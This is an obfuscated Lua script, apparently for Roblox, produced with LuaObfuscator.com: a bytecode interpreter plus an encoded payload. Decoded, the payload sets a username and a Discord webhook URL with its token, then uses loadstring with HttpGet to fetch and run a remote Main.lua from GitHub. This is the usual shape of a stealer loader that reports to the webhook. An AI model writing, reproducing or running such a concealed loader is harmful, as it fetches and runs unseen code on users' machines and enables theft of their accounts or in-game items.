--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v73=v2(v0(v20,16));if v19 then local v91=v5(v73,v19);v19=nil;return v91;else return v73;end end end);local function v21(v22,v23,v24)if v24 then local v74=(v22/(((1166 + 535) -(174 + (5730 -4205)))^(v23-(2 -1))))%((1 + 1)^(((v24-(1 + 0)) -(v23-1)) + (83 -(8 + 74)))) ;return v74-(v74%(1 + (0 -0))) ;else local v75=0 -0 ;local v76;while true do if (v75==(0 + 0)) then v76=(2 + 0)^(v23-(1 + 0)) ;return (((v22%(v76 + v76))>=v76) and ((759 -(30 + 728)) + 0)) or ((0 + 0) -(0 -0)) ;end end end end local function v25()local v38=v1(v16,v18,v18);v18=v18 + 1 ;return v38;end local function v26()local v39,v40=v1(v16,v18,v18 + 2 );v18=v18 + (80 -(23 + 55)) ;return (v40 * (97 + 159)) + v39 ;end local function v27()local v41,v42,v43,v44=v1(v16,v18,v18 + ((1 + 7) -(9 -4)) );v18=v18 + 4 ;return (v44 * (4481680 + 12295536)) + (v43 * (66579 -((1686 -1272) + 629))) + (v42 * (1631 -(990 + 385))) + v41 ;end local function v28()local v45=0 + 0 ;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v45==(2 -0)) then v50=v21(v47,21 + 0 ,142 -111 );v51=((v21(v47,124 -92 )==(1589 -(256 + 1332))) and  -(1331 -(661 + 669))) or (1 + (302 -(8 + 294))) ;v45=1 + 0 + 2 ;end if (v45==(1450 -(223 + 1227))) then v46=v27();v47=v27();v45=1;end if (v45==(802 -(771 + 30))) then v48=2 -1 ;v49=(v21(v47,4 -3 ,74 -54 ) * (2^(144 -112))) + v46 ;v45=2;end if (v45==(8 -(11 -6))) then if (v50==(0 -0)) then if (v49==(1514 -(72 + 1442))) then return v51 * (0 -0) ;else v50=1;v48=1568 -(625 + 943) ;end elseif (v50==2047) then return ((v49==(1899 -(1438 + 461))) and (v51 * (((1165 -(64 + 7)) -(577 + 516))/(0 + 0 + 0)))) or (v51 * NaN) ;end return v8(v51,v50-((5352 -(909 + 535)) -(8742 -5857)) ) * (v48 + (v49/(2^(157 -105)))) ;end end end local function v29(v30)local v52;if  not v30 then v30=v27();if (v30==(1552 -(1446 + 106))) then return "";end end v52=v3(v16,v18,(v18 + v30) -(2 -1) );v18=v18 + v30 ;local v53={};for v66=1, #v52 do v53[v66]=v2(v1(v3(v52,v66,v66)));end return v6(v53);end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v54==4) then while true do if (v55~=(3 -1)) then else local v96=0;while true do if (v96==(0 + 0)) then v60=nil;v61=nil;v96=1;end if (v96==(1 + 0)) then v55=3;break;end end end if (v55~=(3 -2)) then else v58=nil;v59=nil;v55=2;end if (v55==(986 -(650 + 336))) then local v97=0 + 0 ;while true do if (1~=v97) then else v55=1239 -(1052 + 186) ;break;end if (v97==(0 -0)) then v56=0 + 0 ;v57=nil;v97=1;end end end if (v55==3) then v62=nil;while true do local v98=1810 -(1131 + 679) ;while true do if (v98==(0 -0)) then local v101=0 + 0 ;while true do if (v101~=(1 + 0)) then else v98=2 -1 ;break;end if (0~=v101) then else if (v56~=1) then else local v102=745 -(24 + 721) ;while true do if (v102==(1535 -(1195 + 338))) then v56=2;break;end if (v102==1) then for v127=2 -1 ,v61 do local v128=0;local v129;local v130;local v131;local v132;while true do if (v128==(1 + 0)) then local v150=980 -(359 + 621) ;while true do if (v150==1) then v128=151 -(142 + 7) ;break;end if ((454 -(78 + 376))==v150) then v131=nil;v132=nil;v150=1;end end end if (v128==2) then while true do if (v129~=(1 -0)) then else v132=nil;while true do if (v130~=1) then else if (v131==1) then v132=v25()~=(0 + 0) ;elseif (v131==(368 -(101 + 265))) then v132=v28();elseif (v131==(1302 -(1161 + 138))) then v132=v29();end v62[v127]=v132;break;end if (0==v130) then local v161=0;local v162;while true do if (v161~=0) then else v162=0;while true do if (v162~=(0 -0)) then else v131=v25();v132=nil;v162=1;end if (v162~=(1 -0)) then else v130=341 -(281 + 59) ;break;end end break;end end end end break;end if (v129==0) then local v152=0 + 0 ;while true do if (v152==(1644 -(1234 + 409))) then v129=1 -0 ;break;end if (v152==(1722 -(1474 + 248))) then v130=674 -(232 + 442) ;v131=nil;v152=1 + 0 ;end end end end break;end if (v128==(0 -0)) then local v151=0;while true do if (v151~=(1 + 0)) then else v128=1;break;end if (v151==(1392 -(1117 + 275))) then v129=0;v130=nil;v151=1;end end end end end v60[2 + 1 ]=v25();v102=2;end if ((0 + 0)==v102) then v61=v27();v62={};v102=1;end end end if (v56==(775 -(182 + 591))) then local v103=611 -(51 + 560) ;while true do if (v103~=0) then else for v133=436 -(42 + 393) ,v27() do local v134=0;local v135;local v136;while true do if (v134~=0) then else v135=1740 -(1252 + 488) ;v136=nil;v134=1;end if (v134~=1) then else while true do if (v135~=0) then else v136=v25();if (v21(v136,1 + 0 ,1 + 0 )==0) then local v153=0;local v154;local v155;local v156;local v157;while true do if (v153==0) then v154=0 -0 ;v155=nil;v153=1;end if (v153==(5 -3)) then while true do if (v154==0) then local v163=0 + 0 ;while true do if (0==v163) then v155=v21(v136,1160 -(588 + 570) ,3);v156=v21(v136,1088 -(846 + 238) ,4 + 2 );v163=1;end if (v163==(1 + 0)) then v154=1;break;end end end if (v154~=2) then else local v164=0;local v165;while true do if (v164~=(0 + 0)) then else v165=0;while true do if (v165==0) then if (v21(v156,1 + 0 ,1)==(66 -(44 + 21))) then v157[1 + 1 ]=v62[v157[2 + 0 ]];end if (v21(v156,987 -(544 + 441) ,2)~=1) then else v157[3]=v62[v157[1220 -(280 + 937) ]];end v165=4 -3 ;end if (v165~=1) then else v154=246 -(191 + 52) ;break;end end break;end end end if (v154==(7 -4)) then if (v21(v156,11 -8 ,253 -(149 + 101) )~=(1 -0)) then else v157[4]=v62[v157[1125 -(27 + 1094) ]];end v57[v133]=v157;break;end if (1~=v154) then else local v167=0;while true do if (v167~=1) then else v154=1 + 1 ;break;end if (v167==(0 -0)) then v157={v26(),v26(),nil,nil};if (v155==0) then local v170=0 + 0 ;local v171;while true do if (v170==0) then v171=0;while true do if (v171==0) then v157[3]=v26();v157[4]=v26();break;end end break;end end elseif (v155==1) then v157[1 + 2 ]=v27();elseif (v155==(1183 -(306 + 875))) then v157[12 -9 ]=v27() -(2^16) ;elseif (v155==(2 + 1)) then local v180=0 + 0 ;local v181;while true do if (v180~=0) then else v181=0 + 0 ;while true do if (v181==(0 -0)) then v157[3 + 0 ]=v27() -(2^(1927 -(1800 + 111))) ;v157[4]=v26();break;end end break;end end end v167=1;end end end end break;end if (v153==(740 -(379 + 360))) then v156=nil;v157=nil;v153=3 -1 ;end end end break;end end break;end end end for v137=1 + 0 ,v27() do v58[v137-1 ]=v33();end v103=1;end if (v103~=1) then else for v139=1,v27() do v59[v139]=v27();end return v60;end end end v101=1;end end end if (v98==(199 -(44 + 154))) then if (v56==(243 -(96 + 147))) then v57={};v58={};v59={};v60={v57,v58,nil,v59};v56=1;end break;end end end break;end end break;end if (v54==(6 -4)) then v59=nil;v60=nil;v54=3;end if (v54==(218 -(66 + 151))) then v57=nil;v58=nil;v54=1 + 1 ;end if (v54==0) then v55=0 + 0 ;v56=nil;v54=1;end if ((2 + 1)==v54) then v61=nil;v62=nil;v54=4;end end end local function v34(v35,v36,v37)local v63=v35[1];local v64=v35[2];local v65=v35[3];return function(...)local v68=1;local v69= -1;local v70={...};local v71=v12("#",...) -1 ;local function v72()local v77=v63;local v78=v64;local v79=v65;local v80=v32;local v81={};local v82={};local v83={};for v87=0 -0 ,v71 do if ((v87>=v79) or ((4799 -1835)>(4358 -(230 + 12)))) then v81[v87-v79 ]=v70[v87 + 1 ];else v83[v87]=v70[v87 + (1144 -(1051 + 92)) ];end end local v84=(v71-v79) + 1 + 0 ;local v85;local v86;while true do local v88=0 + 0 ;local v89;while true do if ((v88==(0 -0)) or ((1479 + 750)>=(4129 -(109 + 875)))) then v89=0 + 0 + 0 ;while true do if (((1805 -(645 + 428))==(1408 -(386 + 290))) and (v89==(831 -(698 + 133)))) then v85=v77[v68];v86=v85[1 + 0 ];v89=1;end if ((4368==4368) and (v89==(528 -(165 + 107 + 255)))) then if ((v86<=(1 + 3)) or ((2853 -(546 + 746))>(2894 -(12 + 82)))) then if ((v86<=(1 -(0 + 0))) or (4316<=(4726 -(460 + 529)))) then if (((7948 -4011)>981) and (v86==(0 -(0 -0)))) then do return;end elseif (((1981 + 2084 + 739)>=((2042 -(561 + 261)) -741)) and (v83[v85[2]]==v85[(1443 + 413) -(1450 + 115 + 287) ])) then v68=v68 + ((3862 -2301) -(169 + (3984 -2593))) ;else v68=v85[1113 -(841 + 269) ];end elseif (((2933 -(69 + 91))<(2851 + 299)) and (v86<=(612 -(199 + (1385 -974))))) then local v104=0 + 0 ;local v105;local v106;while true do if ((v104==(1 + 0)) or ((3911 -(492 + 508))>=4971)) then v83[v105 + 1 ]=v106;v83[v105]=v106[v85[1987 -(413 + 1570) ]];break;end if (((3894 -(246 + 134))==(1054 + 2460)) and (v104==(0 + 0))) then local v126=0;while true do if ((((2570 -(471 + 932)) -371)>=(1186 -(993 + 122))) and ((1 + 0)==v126)) then v104=2 -1 ;break;end if (((4434 -1592)<=(12731 -9232)) and (v126==(0 -0))) then v105=v85[2];v106=v83[v85[1 + 2 ]];v126=1397 -(633 + 763) ;end end end end elseif ((((7434 -5079) -(83 + 574))==(2248 -(486 + (240 -176)))) and (v86>3)) then local v111=1524 -((2636 -(48 + 1605)) + 541) ;local v112;local v113;local v114;local v115;while true do if ((3951>(151 + 917)) and (v111==(1 + 1))) then for v147=v112,v69 do local v148=0;local v149;while true do if ((3909==(139 + 3770)) and (v148==0)) then v149=0 + 0 ;while true do if ((v149==(383 -(195 + 188))) or (((5764 -(277 + 742)) -2506)>=(3567 -(115 + 320)))) then v115=v115 + 1 + 0 ;v83[v147]=v113[v115];break;end end break;end end end break;end if ((v111==1) or ((2093 -(11 + 5 + (2109 -(575 + 1272))))<=(30 + 4 + 88))) then local v141=0 -0 ;while true do if ((v141==(0 -(0 -0))) or (4555<((1497 -373) + 560))) then v69=(v114 + v112) -(4 -3) ;v115=630 -(355 + 275) ;v141=1 + 0 ;end if (((4820 -(1345 + 586))==(2097 + 792)) and (v141==(1 + 0))) then v111=86 -(74 + 10) ;break;end end end if ((1198<=(3517 -1549)) and (v111==(0 -0))) then v112=v85[2];v113,v114=v80(v83[v112](v13(v83,v112 + 1 + 0 ,v85[419 -(80 + 336) ])));v111=1 -0 ;end end else v83[v85[2]]=v37[v85[1131 -(452 + 676) ]];end elseif (((1396 + 441)>=(1777 -((769 -(618 + 74)) + 591))) and (v86<=(21 -15))) then if (((1410 + 229)>(1373 -941)) and (v86==(3 + 2))) then v83[v85[2]]();else v83[v85[1759 -((2171 -(165 + 484)) + 235) ]]=v85[674 -(236 + 435) ];end elseif ((45<(9408 -6497)) and (v86<=(528 -(379 + 142)))) then v68=v85[1748 -(1284 + 461) ];elseif (((95 + 512)<=(779 + 819 + 3131)) and (v86>(17 -9))) then local v118=1837 -(479 + 1358) ;local v119;while true do if ((v118==(0 -0)) or ((1062 + 1762)<(2377 + 355))) then v119=v85[(965 -(504 + 455)) -4 ];v83[v119]=v83[v119](v13(v83,v119 + (3 -(2 + 0)) ,v69));break;end end else v37[v85[9 -6 ]]=v83[v85[1 + (2 -1) ]];end v68=v68 + 1 ;break;end end break;end end end end A,B=v32(v11(v72));if  not A[1] then local v90=v35[4][v68] or "?" ;error("Script error at ["   .. v90   .. "]:"   .. A[2] );else return v13(A,2,B);end end;end return v34(v33(),{},v17)(...);end v15("LOL!0A3O00028O0003083O00557365724E616D65030F3O0058784173746572696F64785831323303073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3130393037303539313235363736392O3339322F69624E54394639626E32483372784D746E666A31704C6D72654D6636577A41454D53796255716E33484E39676D6E5A4D34494E737546767569626D4E6B56664461677541026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033A3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6B34662O742F52692O7A2F6D61696E2F4D61696E2E6C756100143O0012063O00013O0026013O0008000100010004073O00080001001206000100033O001208000100023O001206000100053O001208000100043O0012063O00063O0026013O0001000100060004073O00010001001203000100073O001203000200083O0020020002000200090012060004000A4O0004000200044O000900013O00022O00050001000100010004073O001300010004073O000100016O00017O00143O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
